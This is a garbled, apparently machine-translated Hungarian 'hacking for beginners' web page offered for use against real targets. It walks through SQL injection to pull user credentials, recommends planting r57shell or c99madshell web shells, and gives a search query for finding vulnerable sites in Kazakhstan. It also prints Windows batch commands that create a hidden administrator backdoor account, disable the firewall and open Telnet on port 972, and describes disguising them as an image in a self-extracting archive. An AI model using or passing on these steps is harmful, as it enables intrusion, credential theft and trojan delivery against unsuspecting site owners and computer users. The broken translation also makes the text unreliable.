A hackelés módszerei

A hackelés módszerei
[Hackelés kezdőknek]

$ id = $ _REQUEST ['id'];
$ res = mysql_query ("SELECT * FROM HÍREK, ahol id_news = $ id");

Ha nem szűrt, akkor hiba lép fel:

(Figyelmeztetés: mysql (): az elküldött argumentum nem érvényes MySQL eredményforrás in)

Ezt követően a táblázatban szereplő mezőket kiszámolja az ORDER BY-záradék használatával

Tegyük fel, hogy a 7 mező közül 3 jelenik meg a webhelyen.

A 3., 5. mező jelenik meg. A MySQL adatbázis verziószámát ()

Az adatbázis egy verzióját a 3. mezőben kell feltüntetni a webhelyen. Tegyük fel, hogy ez egy 5 változat.

Minden változat a fenti 4. van egyetemes INFORMATION_SCHEMA.TABLES asztal és TABLE_NAME területen.
INFORMATION_SCHEMA.COLUMNS és COLUMN_NAME

Most a 3. mezőben megjelenik az adatbázisban lévő összes táblázat.

Minden oszlop a táblázatokban található.

Továbbá megtaláljuk a táblázatot, például a felhasználókat és egy mezőt, például user_name, user_pass, user_email, user_mobile, user_address

Ha hozzáférést kap a webhely adminisztrátorához, olyan sebezhetőséget használhat, mint a PHP injekció
Ez az, hogy töltse ki a shell szerver (speciális php scriptet, amely teljes hozzáférést biztosít a szerver és tárhely általában orr, ha a szerver nem talált egyetlen helyszínen, és 50 -. 100, akkor is lehet használni, hogy hozzáférjen szerkeszti a helyszínek és a menedzsment a szerver operációs rendszer ) például r57shell vagy c99madshell.

Az ilyen biztonsági rések megtalálása a webhelyeken nem nehéz, csak írja be a google.com webhelyet
kérés: inurl: news.php? id = 5 oldal: kz Figyelmeztetés: mysql

Kérésre sok sebezhető hely található Kazahsztánban.

Hackelés a számítógépen.
Olyan sokféle módon létezik, de az egyetemességről beszélni fogok, és teljes hozzáférést biztosít a számítógéphez, amíg csatlakozik az asztalhoz.

chcp 1251
nettó felhasználó coolz 12333 / add
net localgroup adminisztrátorok coolz / add
net localgroup adminisztrátorok coolz / add
net stop sharedaccess
sc config tlntsvr start = auto
tlntadmn config port = 972 sec = -NTLM
net start Telnet

Külön felhasználót hoz létre a hűtőrendszerben, és jelszavát 12333-ra állítja
Ezután rendszergazdai jogokat rendel. És megnyílik a 972-es port.

Ezután válassza ki a "vparit" fájlt, legyen kép 1.jpg

Path =% WinDir% temp
SavePath
Beállítás = cool.bat
Setup = 1.exe
Csendes = 1

Minden álcázott archívum a batikikkal készen áll

Ez azt jelenti, hogy az archívum megnyitása után a bat fájl végrehajtásra kerül, majd megnyílik a kép

A számítógéphez való csatlakozás után elérheti a távoli kezelést
Ehhez írja be a következő paramétereket a parancssorba:
chcp 1251
net localgroup Távoli asztali felhasználók coolz / add
nettó számlák / maxpwage: korlátlan
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" / v "coolz" / t REG_DWORD / d 0 / f
net stop sharedaccess
sc config sharedaccess start = letiltva
sc config tlntsvr start = auto

Elmondom neked a doboz rövid megrongálódását.
3 módja van a hackelésnek:
1. jelszó keresés szótár szerint
Az XSS sebezhetőség második használata
3. szociális tervezés

Kapcsolódó cikkek

• A kínai orvoslás csigolyák hernia kezelési módszerei

• Reflexoterápia (reflex terápia) - reflexoterápiás kezelés, a legjobb módszerek garantálják

• Módszer - megelőző töltés - jó fogászati ​​portál, jó